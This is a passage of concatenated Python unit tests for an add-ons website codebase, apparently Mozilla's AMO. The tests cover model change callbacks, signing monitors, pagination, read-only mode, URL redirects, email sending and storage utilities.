eq_(local.pinned, True)
eq_(local.pinned, True)
eq_(local.pinned, False)
class TestModelBase(TestCase):
fixtures = ['base/addon_3615']
def setUp(self):
self.saved_cb = amo.models._on_change_callbacks.copy()
amo.models._on_change_callbacks.clear()
self.cb = Mock()
self.cb.__name__ = 'testing_mock_callback'
Addon.on_change(self.cb)
def tearDown(self):
amo.models._on_change_callbacks = self.saved_cb
def test_multiple_ignored(self):
cb = Mock()
cb.__name__ = 'something'
old = len(amo.models._on_change_callbacks[Addon])
Addon.on_change(cb)
eq_(len(amo.models._on_change_callbacks[Addon]), old + 1)
Addon.on_change(cb)
eq_(len(amo.models._on_change_callbacks[Addon]), old + 1)
def test_change_called_on_new_instance_save(self):
for create_addon in (Addon, Addon.objects.create):
addon = create_addon(site_specific=False, type=amo.ADDON_EXTENSION)
addon.site_specific = True
addon.save()
assert self.cb.called
kw = self.cb.call_args[1]
eq_(kw['old_attr']['site_specific'], False)
eq_(kw['new_attr']['site_specific'], True)
eq_(kw['instance'].id, addon.id)
eq_(kw['sender'], Addon)
def test_change_called_on_update(self):
addon = Addon.objects.get(pk=3615)
addon.update(site_specific=False)
assert self.cb.called
kw = self.cb.call_args[1]
eq_(kw['old_attr']['site_specific'], True)
eq_(kw['new_attr']['site_specific'], False)
eq_(kw['instance'].id, addon.id)
eq_(kw['sender'], Addon)
def test_change_called_on_save(self):
addon = Addon.objects.get(pk=3615)
addon.site_specific = False
addon.save()
assert self.cb.called
kw = self.cb.call_args[1]
eq_(kw['old_attr']['site_specific'], True)
eq_(kw['new_attr']['site_specific'], False)
eq_(kw['instance'].id, addon.id)
eq_(kw['sender'], Addon)
def test_change_is_not_recursive(self):
class fn:
called = False
def callback(old_attr=None, new_attr=None, instance=None,
sender=None, **kw):
fn.called = True
# Both save and update should be protected:
instance.update(site_specific=False)
instance.save()
Addon.on_change(callback)
addon = Addon.objects.get(pk=3615)
addon.save()
assert fn.called
# No exception = pass
def test_safer_get_or_create(self):
data = {'guid': '123', 'type': amo.ADDON_EXTENSION}
a, c = Addon.objects.safer_get_or_create(**data)
assert c
b, c = Addon.objects.safer_get_or_create(**data)
assert not c
eq_(a, b)
def test_cache_key():
# Test that we are not taking the db into account when building our
# cache keys for django-cache-machine. See bug 928881.
eq_(Addon._cache_key(1, 'default'), Addon._cache_key(1, 'slave'))
########NEW FILE########
__FILENAME__ = test_monitor
import time
from django.conf import settings
from mock import Mock, patch
from nose.tools import eq_
import requests
import amo.tests
from amo.monitors import receipt_signer as signer, package_signer
@patch.object(settings, 'SIGNED_APPS_SERVER_ACTIVE', True)
@patch.object(settings, 'SIGNING_SERVER', 'http://foo/')
@patch.object(settings, 'SIGNED_APPS_SERVER', 'http://baz/')
class TestMonitor(amo.tests.TestCase):
# Some rudimentary tests for the rest of the monitor would be nice.
def _make_receipt(self):
now = time.time()
return [
{'exp': now + (3600 * 36), 'iss': 'http://foo/cert.jwk'}, '']
@patch('amo.monitors.receipt')
def test_sign_fails(self, receipt):
from lib.crypto.receipt import SigningError
receipt.sign.side_effect = SigningError
eq_(signer()[0][:16], 'Error on signing')
@patch('amo.monitors.receipt')
def test_crack_fails(self, receipt):
receipt.crack.side_effect = ValueError
eq_(signer()[0][:25], 'Error on cracking receipt')
@patch('amo.monitors.receipt')
def test_expire(self, receipt):
now = time.time()
receipt.crack.return_value = [{'exp': now + (3600 * 12)}, '']
eq_(signer()[0][:21], 'Cert will expire soon')
@patch('requests.get')
@patch('amo.monitors.receipt')
def test_good(self, receipt, cert_response):
receipt.crack.return_value = self._make_receipt()
cert_response.return_value.ok = True
cert_response.return_value.json = lambda: {'jwk': []}
eq_(signer()[0], '')
@patch('requests.get')
@patch('amo.monitors.receipt')
def test_public_cert_connection_error(self, receipt, cert_response):
receipt.crack.return_value = self._make_receipt()
cert_response.side_effect = Exception
eq_(signer()[0][:29], 'Error on checking public cert')
@patch('requests.get')
@patch('amo.monitors.receipt')
def test_public_cert_not_found(self, receipt, cert_response):
receipt.crack.return_value = self._make_receipt()
cert_response.return_value.ok = False
cert_response.return_value.reason = 'Not Found'
eq_(signer()[0][:29], 'Error on checking public cert')
@patch('requests.get')
@patch('amo.monitors.receipt')
def test_public_cert_no_json(self, receipt, cert_response):
receipt.crack.return_value = self._make_receipt()
cert_response.return_value.ok = True
cert_response.return_value.json = lambda: None
eq_(signer()[0][:29], 'Error on checking public cert')
@patch('requests.get')
@patch('amo.monitors.receipt')
def test_public_cert_invalid_jwk(self, receipt, cert_response):
receipt.crack.return_value = self._make_receipt()
cert_response.return_value.ok = True
cert_response.return_value.json = lambda: {'foo': 1}
eq_(signer()[0][:29], 'Error on checking public cert')
@patch('requests.post')
def test_app_sign_good(self, sign_response):
sign_response().status_code = 200
sign_response().content = '{"zigbert.rsa": "Vm0wd2QyUXlVWGxW"}'
eq_(package_signer()[0], '')
@patch('amo.monitors.os.unlink', new=Mock)
@patch('requests.post')
def test_app_sign_fail(self, sign_response):
sign_response().side_effect = requests.exceptions.HTTPError
assert package_signer()[0].startswith('Error on package signing')
########NEW FILE########
__FILENAME__ = test_paginator
from mock import Mock
from nose.tools import eq_
from amo.helpers import Paginator
def mock_pager(page_number, num_pages, count):
m = Mock()
m.paginator = Mock()
m.number = page_number
m.paginator.num_pages = num_pages
m.paginator.count = count
return m
def assert_range(page_number, num_pages, expected):
p = Paginator(mock_pager(page_number, num_pages, 100))
eq_(p.range(), expected)
def test_page_range():
assert_range(1, 75, [1, 2, 3, 4, 5, 6, 7, 8])
assert_range(2, 75, [1, 2, 3, 4, 5, 6, 7, 8])
assert_range(3, 75, [1, 2, 3, 4, 5, 6, 7, 8])
assert_range(4, 75, [1, 2, 3, 4, 5, 6, 7, 8])
assert_range(5, 75, [2, 3, 4, 5, 6, 7, 8])
assert_range(6, 75, [3, 4, 5, 6, 7, 8, 9])
assert_range(8, 75, [5, 6, 7, 8, 9, 10, 11])
assert_range(37, 75, [34, 35, 36, 37, 38, 39, 40])
assert_range(70, 75, [67, 68, 69, 70, 71, 72, 73])
assert_range(71, 75, [68, 69, 70, 71, 72, 73, 74])
assert_range(72, 75, [68, 69, 70, 71, 72, 73, 74, 75])
assert_range(73, 75, [68, 69, 70, 71, 72, 73, 74, 75])
assert_range(74, 75, [68, 69, 70, 71, 72, 73, 74, 75])
assert_range(75, 75, [68, 69, 70, 71, 72, 73, 74, 75])
assert_range(1, 8, [1, 2, 3, 4, 5, 6, 7, 8])
def test_dots():
p = Paginator(mock_pager(1, 5, 100))
assert not p.pager.dotted_upper
assert not p.pager.dotted_lower
p = Paginator(mock_pager(1, 25, 100))
assert p.pager.dotted_upper
assert not p.pager.dotted_lower
p = Paginator(mock_pager(12, 25, 100))
assert p.pager.dotted_upper
assert p.pager.dotted_lower
p = Paginator(mock_pager(24, 25, 100))
assert not p.pager.dotted_upper
assert p.pager.dotted_lower
########NEW FILE########
__FILENAME__ = test_readonly
from django.conf import settings
from django.db import models
from django.utils import importlib
import MySQLdb as mysql
from nose.tools import assert_raises, eq_
from pyquery import PyQuery as pq
import amo.tests
from amo.urlresolvers import reverse
from addons.models import Addon
def pubdir(ob):
for name in dir(ob):
if not name.startswith('_'):
yield name
def quickcopy(val):
if isinstance(val, dict):
val = val.copy()
elif isinstance(val, list):
val = list(val)
return val
class ReadOnlyModeTest(amo.tests.TestCase):
extra = ('amo.middleware.ReadOnlyMiddleware',)
def setUp(self):
models.signals.pre_save.connect(self.db_error)
models.signals.pre_delete.connect(self.db_error)
self.old_settings = dict((k, quickcopy(getattr(settings, k)))
for k in pubdir(settings))
settings.SLAVE_DATABASES = ['default']
settings_module = importlib.import_module(settings.SETTINGS_MODULE)
settings_module.read_only_mode(settings._wrapped.__dict__)
self.client.handler.load_middleware()
def tearDown(self):
for k in pubdir(settings):
if k not in self.old_settings:
delattr(self.old_settings, k)
for k, v in self.old_settings.items():
try:
setattr(settings, k, v)
except AttributeError:
# __weakref__
pass
models.signals.pre_save.disconnect(self.db_error)
models.signals.pre_delete.disconnect(self.db_error)
def db_error(self, *args, **kwargs):
raise mysql.OperationalError("You can't do this in read-only mode.")
def test_db_error(self):
assert_raises(mysql.OperationalError, Addon.objects.create, id=12)
def test_bail_on_post(self):
r = self.client.post('/en-US/firefox/')
eq_(r.status_code, 503)
title = pq(r.content)('title').text()
assert title.startswith('Maintenance in progress'), title
########NEW FILE########
__FILENAME__ = test_redirects
# -*- coding: utf-8 -*-
"""Check all our redirects from remora to zamboni."""
from nose.tools import eq_
import amo
import amo.tests
from addons.models import Category
from applications.models import Application
class TestRedirects(amo.tests.TestCase):
fixtures = ['base/apps', 'reviews/test_models', 'base/global-stats']
def test_top_tags(self):
"""`/top-tags/?` should 301 to `/tags/top`."""
response = self.client.get(u'/top-tags/', follow=True)
self.assert3xx(response, '/en-US/firefox/tags/top',
status_code=301)
def test_contribute_installed(self):
"""`/addon/\d+/about` should go to
`/addon/\d+/contribute/installed`."""
r = self.client.get(u'/addon/5326/about', follow=True)
redirect = r.redirect_chain[-1][0]
assert redirect.endswith(
'/en-US/firefox/addon/5326/contribute/installed/')
def test_contribute(self):
"""`/addons/contribute/$id` should go to `/addon/$id/contribute`."""
response = self.client.get(u'/addon/5326/contribute', follow=True)
redirect = response.redirect_chain[-1][0]
assert redirect.endswith('/en-US/firefox/addon/5326/contribute/')
def test_utf8(self):
"""Without proper unicode handling this will fail."""
response = self.client.get(u'/api/1.5/search/ツールバー',
follow=True)
# Sphinx will be off so let's just test that it redirects.
eq_(response.redirect_chain[0][1], 301)
def test_parameters(self):
"""Bug 554976. Make sure when we redirect, we preserve our query
strings."""
url = u'/users/login?to=/en-US/firefox/users/edit'
r = self.client.get(url, follow=True)
self.assert3xx(r, '/en-US/firefox' + url, status_code=301)
def test_reviews(self):
response = self.client.get('/reviews/display/4', follow=True)
self.assert3xx(response, '/en-US/firefox/addon/a4/reviews/',
status_code=301)
def test_browse(self):
response = self.client.get('/browse/type:3', follow=True)
self.assert3xx(response, '/en-US/firefox/language-tools/',
status_code=301)
def test_accept_language(self):
"""
Given an Accept Language header, do the right thing. See bug 439568
for juicy details.
"""
response = self.client.get('/', follow=True, HTTP_ACCEPT_LANGUAGE='de')
self.assert3xx(response, '/de/firefox/', status_code=301)
response = self.client.get('/', follow=True,
HTTP_ACCEPT_LANGUAGE='en-us, de')
self.assert3xx(response, '/en-US/firefox/', status_code=301)
response = self.client.get('/', follow=True,
HTTP_ACCEPT_LANGUAGE='fr, en')
self.assert3xx(response, '/fr/firefox/', status_code=301)
response = self.client.get('/', follow=True,
HTTP_ACCEPT_LANGUAGE='pt-XX, xx, yy')
self.assert3xx(response, '/pt-PT/firefox/', status_code=301)
response = self.client.get('/', follow=True,
HTTP_ACCEPT_LANGUAGE='pt')
self.assert3xx(response, '/pt-PT/firefox/', status_code=301)
response = self.client.get('/', follow=True,
HTTP_ACCEPT_LANGUAGE='pt, de')
self.assert3xx(response, '/pt-PT/firefox/', status_code=301)
response = self.client.get('/', follow=True,
HTTP_ACCEPT_LANGUAGE='pt-XX, xx, de')
self.assert3xx(response, '/pt-PT/firefox/', status_code=301)
response = self.client.get('/', follow=True,
HTTP_ACCEPT_LANGUAGE='xx, yy, zz')
self.assert3xx(response, '/en-US/firefox/', status_code=301)
response = self.client.get('/', follow=True,
HTTP_ACCEPT_LANGUAGE='some,thing-very;very,,,broken!\'jj')
self.assert3xx(response, '/en-US/firefox/', status_code=301)
response = self.client.get('/', follow=True,
HTTP_ACCEPT_LANGUAGE='en-us;q=0.5, de')
self.assert3xx(response, '/de/firefox/', status_code=301)
def test_users(self):
response = self.client.get('/users/info/1', follow=True)
self.assert3xx(response, '/en-US/firefox/user/1/',
status_code=301)
def test_extension_sorting(self):
r = self.client.get('/browse/type:1?sort=updated', follow=True)
self.assert3xx(r, '/en-US/firefox/extensions/?sort=updated',
status_code=301)
r = self.client.get('/browse/type:1?sort=name', follow=True)
self.assert3xx(r, '/en-US/firefox/extensions/?sort=name',
status_code=301)
r = self.client.get('/browse/type:1?sort=newest', follow=True)
self.assert3xx(r, '/en-US/firefox/extensions/?sort=created',
status_code=301)
r = self.client.get('/browse/type:1?sort=weeklydownloads', follow=True)
self.assert3xx(r, '/en-US/firefox/extensions/?sort=popular',
status_code=301)
r = self.client.get('/browse/type:1?sort=averagerating', follow=True)
self.assert3xx(r, '/en-US/firefox/extensions/?sort=rating',
status_code=301)
# If we don't recognize the sort, they get nothing.
r = self.client.get('/browse/type:1?sort=xxx', follow=True)
self.assert3xx(r, '/en-US/firefox/extensions/',
status_code=301)
a = Application.objects.create()
Category.objects.create(pk=12, slug='woo', type=amo.ADDON_EXTENSION,
application=a, count=1, weight=0)
r = self.client.get('/browse/type:1/cat:12?sort=averagerating',
follow=True)
url, code = r.redirect_chain[-1]
eq_(code, 301)
assert url.endswith('/en-US/firefox/extensions/woo/?sort=rating')
def test_addons_reviews_rss(self):
r = self.client.get('/addons/reviews/4/format:rss', follow=True)
self.assert3xx(r, '/en-US/firefox/addon/4/reviews/format:rss',
status_code=301)
def test_mobile_to_android(self):
"""
'Mobile' is the legacy XUL-based Firefox for Android.
'Android' is the new hotness.
"""
res = self.client.get('/mobile', follow=True)
self.assert3xx(res, '/en-US/android/', status_code=301)
res = self.client.get('/mobile/', follow=True)
self.assert3xx(res, '/en-US/android/', status_code=301)
res = self.client.get('/mobile/extensions/', follow=True)
self.assert3xx(res, '/en-US/mobile/extensions/', status_code=301)
########NEW FILE########
__FILENAME__ = test_send_mail
from django import test
from django.conf import settings
from django.core import mail
from django.core.mail import EmailMessage
from django.template import Context as TemplateContext
from django.utils import translation
import mock
from nose.tools import eq_
import users.notifications
from amo.models import FakeEmail
from amo.utils import send_html_mail_jinja, send_mail
from users.models import UserNotification, UserProfile
class TestSendMail(test.TestCase):
fixtures = ['base/users']
def setUp(self):
self._email_blacklist = list(getattr(settings, 'EMAIL_BLACKLIST', []))
def tearDown(self):
translation.activate('en_US')
settings.EMAIL_BLACKLIST = self._email_blacklist
def test_send_string(self):
to = '[email protected]'
with self.assertRaises(ValueError):
send_mail('subj', 'body', recipient_list=to)
def test_blacklist(self):
to = '[email protected]'
settings.EMAIL_BLACKLIST = (to,)
success = send_mail('test subject', 'test body',
recipient_list=[to], fail_silently=False)
assert success
eq_(len(mail.outbox), 0)
def test_blacklist_flag(self):
to = '[email protected]'
settings.EMAIL_BLACKLIST = (to,)
success = send_mail('test subject', 'test body',
recipient_list=[to], fail_silently=False,
use_blacklist=True)
assert success
eq_(len(mail.outbox), 0)
success = send_mail('test subject', 'test body',
recipient_list=[to], fail_silently=False,
use_blacklist=False)
assert success
eq_(len(mail.outbox), 1)
def test_user_setting_default(self):
user = UserProfile.objects.all()[0]
to = user.email
# Confirm there's nothing in the DB and we're using the default
eq_(UserNotification.objects.count(), 0)
# Make sure that this is True by default
setting = users.notifications.NOTIFICATIONS_BY_SHORT['reply']
eq_(setting.default_checked, True)
success = send_mail('test subject', 'test body', perm_setting='reply',
recipient_list=[to], fail_silently=False)
assert success, "Email wasn't sent"
eq_(len(mail.outbox), 1)
eq_(mail.outbox[0].body.count('users/unsubscribe'), 1) # bug 676601
def test_user_setting_checked(self):
user = UserProfile.objects.all()[0]
to = user.email
n = users.notifications.NOTIFICATIONS_BY_SHORT['reply']
UserNotification.objects.get_or_create(notification_id=n.id,
user=user, enabled=True)
# Confirm we're reading from the database
eq_(UserNotification.objects.filter(notification_id=n.id).count(), 1)
success = send_mail('test subject', 'test body', perm_setting='reply',
recipient_list=[to], fail_silently=False)
assert "You received this email because" in mail.outbox[0].body
assert success, "Email wasn't sent"
eq_(len(mail.outbox), 1)
def test_user_mandatory(self):
# Make sure there's no unsubscribe link in mandatory emails.
user = UserProfile.objects.all()[0]
to = user.email
n = users.notifications.NOTIFICATIONS_BY_SHORT['individual_contact']
UserNotification.objects.get_or_create(notification_id=n.id,
user=user, enabled=True)
assert n.mandatory, "Notification isn't mandatory"
success = send_mail('test subject', 'test body', perm_setting=n,
recipient_list=[to], fail_silently=False)
assert success, "Email wasn't sent"
body = mail.outbox[0].body
assert "Unsubscribe:" not in body
assert "You can't unsubscribe from" in body
def test_user_setting_unchecked(self):
user = UserProfile.objects.all()[0]
to = user.email
n = users.notifications.NOTIFICATIONS_BY_SHORT['reply']
UserNotification.objects.get_or_create(notification_id=n.id,
user=user, enabled=False)
# Confirm we're reading from the database.
eq_(UserNotification.objects.filter(notification_id=n.id).count(), 1)
success = send_mail('test subject', 'test body', perm_setting='reply',
recipient_list=[to], fail_silently=False)
assert success, "Email wasn't sent"
eq_(len(mail.outbox), 0)
@mock.patch.object(settings, 'EMAIL_BLACKLIST', ())
def test_success_real_mail(self):
assert send_mail('test subject', 'test body',
recipient_list=['[email protected]'],
fail_silently=False)
eq_(len(mail.outbox), 1)
eq_(mail.outbox[0].subject.find('test subject'), 0)
eq_(mail.outbox[0].body.find('test body'), 0)
@mock.patch.object(settings, 'EMAIL_BLACKLIST', ())
@mock.patch.object(settings, 'SEND_REAL_EMAIL', False)
def test_success_fake_mail(self):
assert send_mail('test subject', 'test body',
recipient_list=['[email protected]'],
fail_silently=False)
eq_(len(mail.outbox), 0)
eq_(FakeEmail.objects.count(), 1)
eq_(FakeEmail.objects.get().message.endswith('test body'), True)
@mock.patch('amo.utils.Context')
def test_dont_localize(self, fake_Context):
perm_setting = []
def ctx(d, autoescape):
perm_setting.append(unicode(d['perm_setting']))
return TemplateContext(d, autoescape=autoescape)
fake_Context.side_effect = ctx
user = UserProfile.objects.all()[0]
to = user.email
translation.activate('zh_TW')
send_mail('test subject', 'test body', perm_setting='reply',
recipient_list=[to], fail_silently=False)
eq_(perm_setting[0], u'an add-on developer replies to my review')
def test_send_html_mail_jinja(self):
emails = ['[email protected]']
subject = u'Test'
html_template = 'tests/email/test.html'
text_template = 'tests/email/test.txt'
send_html_mail_jinja(subject, html_template, text_template,
context={}, recipient_list=emails,
from_email=settings.NOBODY_EMAIL,
use_blacklist=False,
perm_setting='individual_contact',
headers={'Reply-To': settings.EDITORS_EMAIL})
msg = mail.outbox[0]
message = msg.message()
eq_(msg.to, emails)
eq_(msg.subject, subject)
eq_(msg.from_email, settings.NOBODY_EMAIL)
eq_(msg.extra_headers['Reply-To'], settings.EDITORS_EMAIL)
eq_(message.is_multipart(), True)
eq_(message.get_content_type(), 'multipart/alternative')
eq_(message.get_default_type(), 'text/plain')
payload = message.get_payload()
eq_(payload[0].get_content_type(), 'text/plain')
eq_(payload[1].get_content_type(), 'text/html')
message1 = payload[0].as_string()
message2 = payload[1].as_string()
assert '<a href' not in message1, 'text-only email contained HTML!'
assert '<a href' in message2, 'HTML email did not contain HTML!'
unsubscribe_msg = unicode(users.notifications.individual_contact.label)
assert unsubscribe_msg in message1
assert unsubscribe_msg in message2
def test_send_multilines_subjects(self):
send_mail('test\nsubject', 'test body', from_email='[email protected]',
recipient_list=['[email protected]'])
eq_('test subject', mail.outbox[0].subject, 'Subject not stripped')
def make_backend_class(self, error_order):
throw_error = iter(error_order)
def make_backend(*args, **kwargs):
if next(throw_error):
class BrokenMessage(object):
def __init__(*args, **kwargs):
pass
def send(*args, **kwargs):
raise RuntimeError('uh oh')
def attach_alternative(*args, **kwargs):
pass
backend = BrokenMessage()
else:
backend = EmailMessage(*args, **kwargs)
return backend
return make_backend
@mock.patch('amo.tasks.EmailMessage')
def test_async_will_retry(self, backend):
backend.side_effect = self.make_backend_class([True, True, False])
with self.assertRaises(RuntimeError):
send_mail('test subject',
'test body',
recipient_list=['[email protected]'])
assert send_mail('test subject',
'test body',
async=True,
recipient_list=['[email protected]'])
@mock.patch('amo.tasks.EmailMessage')
def test_async_will_stop_retrying(self, backend):
backend.side_effect = self.make_backend_class([True, True])
with self.assertRaises(RuntimeError):
send_mail('test subject',
'test body',
async=True,
max_retries=1,
recipient_list=['[email protected]'])
########NEW FILE########
__FILENAME__ = test_storage_utils
from functools import partial
import os
import tempfile
import unittest
from django.core.files.base import ContentFile
from django.core.files.storage import default_storage as storage
from nose.tools import eq_
from amo.storage_utils import (walk_storage, copy_stored_file,
move_stored_file, rm_stored_dir)
from amo.utils import rm_local_tmp_dir
def test_storage_walk():
tmp = tempfile.mkdtemp()
jn = partial(os.path.join, tmp)
try:
storage.save(jn('file1.txt'), ContentFile(''))
storage.save(jn('one/file1.txt'), ContentFile(''))
storage.save(jn('one/file2.txt'), ContentFile(''))
storage.save(jn('one/two/file1.txt'), ContentFile(''))
storage.save(jn('one/three/file1.txt'), ContentFile(''))
storage.save(jn('four/five/file1.txt'), ContentFile(''))
storage.save(jn(u'four/kristi\u2603/kristi\u2603.txt'),
ContentFile(''))
results = [(dir, set(subdirs), set(files))
for dir, subdirs, files in sorted(walk_storage(tmp))]
yield (eq_, results.pop(0), (tmp, set(['four', 'one']), set(['file1.txt'])))
yield (eq_, results.pop(0), (jn('four'),
set(['five', 'kristi\xe2\x98\x83']), set([])))
yield (eq_, results.pop(0), (jn('four/five'), set([]), set(['file1.txt'])))
yield (eq_, results.pop(0), (jn('four/kristi\xe2\x98\x83'), set([]),
set(['kristi\xe2\x98\x83.txt'])))
yield (eq_, results.pop(0), (jn('one'), set(['three', 'two']),
set(['file1.txt', 'file2.txt'])))
yield (eq_, results.pop(0), (jn('one/three'), set([]), set(['file1.txt'])))
yield (eq_, results.pop(0), (jn('one/two'), set([]), set(['file1.txt'])))
yield (eq_, len(results), 0)
finally:
rm_local_tmp_dir(tmp)
def test_rm_stored_dir():
tmp = tempfile.mkdtemp()
jn = partial(os.path.join, tmp)
try:
storage.save(jn('file1.txt'), ContentFile('<stuff>'))
storage.save(jn('one/file1.txt'), ContentFile(''))
storage.save(jn('one/two/file1.txt'), ContentFile('moar stuff'))
storage.save(jn(u'one/kristi\u0107/kristi\u0107.txt'),
ContentFile(''))
rm_stored_dir(jn('one'))
yield (eq_, storage.exists(jn('one')), False)
yield (eq_, storage.exists(jn('one/file1.txt')), False)
yield (eq_, storage.exists(jn('one/two')), False)
yield (eq_, storage.exists(jn('one/two/file1.txt')), False)
yield (eq_, storage.exists(jn(u'one/kristi\u0107/kristi\u0107.txt')),
False)
yield (eq_, storage.exists(jn('file1.txt')), True)
finally:
rm_local_tmp_dir(tmp)
class TestFileOps(unittest.TestCase):
def setUp(self):
self.tmp = tempfile.mkdtemp()
def tearDown(self):
rm_local_tmp_dir(self.tmp)
def path(self, path):
return os.path.join(self.tmp, path)
def contents(self, path):
with storage.open(path, 'rb') as fp:
return fp.read()
def newfile(self, name, contents):
src = self.path(name)
storage.save(src, ContentFile(contents))
return src
def test_copy(self):
src = self.newfile('src.txt', '<contents>')
dest = self.path('somedir/dest.txt')
copy_stored_file(src, dest)
eq_(self.contents(dest), '<contents>')
def test_self_copy(self):
src = self.newfile('src.txt', '<contents>')
dest = self.path('src.txt')
copy_stored_file(src, dest)
eq_(self.contents(dest), '<contents>')
def test_move(self):
src = self.newfile('src.txt', '<contents>')
dest = self.path('somedir/dest.txt')
move_stored_file(src, dest)
eq_(self.contents(dest), '<contents>')
eq_(storage.exists(src), False)
def test_non_ascii(self):
src = self.newfile(u'kristi\u0107.txt',
u'ivan kristi\u0107'.encode('utf8'))
dest = self.path(u'somedir/kristi\u0107.txt')
copy_stored_file(src, dest)
eq_(self.contents(dest), 'ivan kristi\xc4\x87')
def test_copy_chunking(self):
src = self.newfile('src.txt', '<contents>')
dest = self.path('somedir/dest.txt')
copy_stored_file(src, dest, chunk_size=1)
eq_(self.contents(dest), '<contents>')
def test_move_chunking(self):
src = self.newfile('src.txt', '<contents>')
dest = self.path('somedir/dest.txt')
move_stored_file(src, dest, chunk_size=1)
eq_(self.contents(dest), '<contents>')
eq_(storage.exists(src), False)
########NEW FILE########
__FILENAME__ = test_url_prefix
from django import test, shortcuts
from django.conf import settings
from django.core.urlresolvers import set_script_prefix
from nose.tools import eq_, assert_not_equal
import test_utils
import amo.tests
from amo import urlresolvers
from amo.middleware import LocaleAndAppURLMiddleware
class MiddlewareTest(test.TestCase):
"""Tests that the locale and app redirection work properly."""
def setUp(self):
self.rf = test_utils.RequestFactory()
self.middleware = LocaleAndAppURLMiddleware()
def test_redirection(self):
redirections = {
'/': '/en-US/firefox/',
'/en-US': '/en-US/firefox/',
'/firefox': '/en-US/firefox/',
'/android': '/en-US/android/',
# Make sure we don't mess with trailing slashes.
'/addon/1/': '/en-US/firefox/addon/1/',
'/addon/1': '/en-US/firefox/addon/1',
# Check an invalid locale.
'/sda/firefox/addon/1': '/en-US/firefox/addon/1',
# Check a consolidated language (e.g. es-* -> es).
'/es-ES/firefox/addon/1': '/es/firefox/addon/1',
'/es-PE/firefox/addon/1': '/es/firefox/addon/1',
# /admin doesn't get an app.
'/developers': '/en-US/developers',
}
for path, location in redirections.items():
response = self.middleware.process_request(self.rf.get(path))
eq_(response.status_code, 301)
eq_(response['Location'], location)
def process(self, *args, **kwargs):
request = self.rf.get(*args, **kwargs)
return self.middleware.process_request(request)
def test_no_redirect(self):
# /services doesn't get an app or locale.
response = self.process('/services')
assert response is None
def test_vary(self):
response = self.process('/')
eq_(response['Vary'], 'Accept-Language, User-Agent')
response = self.process('/firefox')
eq_(response['Vary'], 'Accept-Language')
response = self.process('/en-US')
eq_(response['Vary'], 'User-Agent')
response = self.process('/en-US/thunderbird')
assert 'Vary' not in response
def test_no_redirect_with_script(self):
response = self.process('/services', SCRIPT_NAME='/oremj')
assert response is None
def test_get_app(self):
def check(url, expected, ua):
response = self.process(url, HTTP_USER_AGENT=ua)
eq_(response['Location'], expected)
check('/en-US/', '/en-US/firefox/', 'Firefox')
check('/de/', '/de/mobile/', 'Fennec')
# Mobile gets priority because it has both strings in its UA...
check('/de/', '/de/mobile/', 'Firefox Fennec')
# SeaMonkey gets priority because it has both strings in its UA...
check('/en-US/', '/en-US/seamonkey/', 'Firefox SeaMonkey')
# Android can found by its user agent.
check('/en-US/', '/en-US/android/', 'Fennec/12.0.1')
check('/en-US/', '/en-US/android/', 'Fennec/12')
check('/en-US/', '/en-US/android/', 'Fennec/11.0')
check('/en-US/', '/en-US/mobile/', 'Fennec/10.9.1')
check('/en-US/', '/en-US/mobile/', 'Fennec/10.9')
# And the user agent changed again.
check('/en-US/', '/en-US/android/',
'Mozilla/5.0 (Android; Mobile; rv:17.0) Gecko/17.0 Firefox/17.0')
# And the user agent yet changed again.
check('/en-US/', '/en-US/android/',
'Mozilla/5.0 (Mobile; rv:18.0) Gecko/18.0 Firefox/18.0')
# And the tablet user agent yet changed again!
check('/en-US/', '/en-US/android/',
'Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0')
def test_get_lang(self):
def check(url, expected):
response = self.process(url)
eq_(response['Location'], expected)
check('/services?lang=fr', '/services')
check('/en-US/firefox?lang=fr', '/fr/firefox/')
check('/de/admin/?lang=fr&foo=bar', '/fr/admin/?foo=bar')
check('/en-US/firefox/?lang=fake', '/en-US/firefox/')
check('/firefox/?lang=fr', '/fr/firefox/')
check('/firefox/?lang=fake', '/en-US/firefox/')
check('/en-US/extensions/?foo=fooval&bar=barval&lang=fr',
'/fr/firefox/extensions/?foo=fooval&bar=barval')
check('/en-US/firefox?lang=es-PE', '/es/firefox/')
class TestPrefixer:
def tearDown(self):
urlresolvers.clean_url_prefixes()
set_script_prefix('/')
def test_split_path(self):
def split_eq(url, locale, app, path):
rf = test_utils.RequestFactory()
prefixer = urlresolvers.Prefixer(rf.get(url))
actual = (prefixer.locale, prefixer.app, prefixer.shortened_path)
eq_(actual, (locale, app, path))
split_eq('/', '', '', '')
split_eq('/en-US', 'en-US', '', '')
split_eq('/en-US/firefox', 'en-US', 'firefox', '')
split_eq('/en-US/firefox/', 'en-US', 'firefox', '')
split_eq('/en-US/firefox/foo', 'en-US', 'firefox', 'foo')
split_eq('/en-US/firefox/foo/', 'en-US', 'firefox', 'foo/')
split_eq('/en-US/foo', 'en-US', '', 'foo')
split_eq('/en-US/foo/', 'en-US', '', 'foo/')
split_eq('/bad/firefox/foo', '', 'firefox', 'foo')
split_eq('/bad/firefox/foo/', '', 'firefox', 'foo/')
split_eq('/firefox/foo', '', 'firefox', 'foo')
split_eq('/firefox/foo/', '', 'firefox', 'foo/')
split_eq('/foo', '', '', 'foo')
split_eq('/foo/', '', '', 'foo/')
def test_fix(self):
rf = test_utils.RequestFactory()
prefixer = urlresolvers.Prefixer(rf.get('/'))
eq_(prefixer.fix('/'), '/en-US/firefox/')
eq_(prefixer.fix('/foo'), '/en-US/firefox/foo')
eq_(prefixer.fix('/foo/'), '/en-US/firefox/foo/')
eq_(prefixer.fix('/admin'), '/en-US/admin')
eq_(prefixer.fix('/admin/'), '/en-US/admin/')
prefixer.locale = 'de'
prefixer.app = 'thunderbird'
eq_(prefixer.fix('/'), '/de/thunderbird/')
eq_(prefixer.fix('/foo'), '/de/thunderbird/foo')
eq_(prefixer.fix('/foo/'), '/de/thunderbird/foo/')
eq_(prefixer.fix('/admin'), '/de/admin')
eq_(prefixer.fix('/admin/'), '/de/admin/')
def test_reverse(self):
# Make sure it works outside the request.
eq_(urlresolvers.reverse('home'), '/')
# With a request, locale and app prefixes work.
client = test.Client()
client.get('/')
eq_(urlresolvers.reverse('home'), '/en-US/firefox/')
def test_script_name(self):
rf = test_utils.RequestFactory()
request = rf.get('/foo', SCRIPT_NAME='/oremj')
prefixer = urlresolvers.Prefixer(request)
eq_(prefixer.fix(prefixer.shortened_path), '/oremj/en-US/firefox/foo')
# Now check reverse.
urlresolvers.set_url_prefix(prefixer)
set_script_prefix('/oremj')
eq_(urlresolvers.reverse('home'), '/oremj/en-US/firefox/')
class TestPrefixerActivate(amo.tests.TestCase):
def test_activate_locale(self):
with self.activate(locale='fr'):
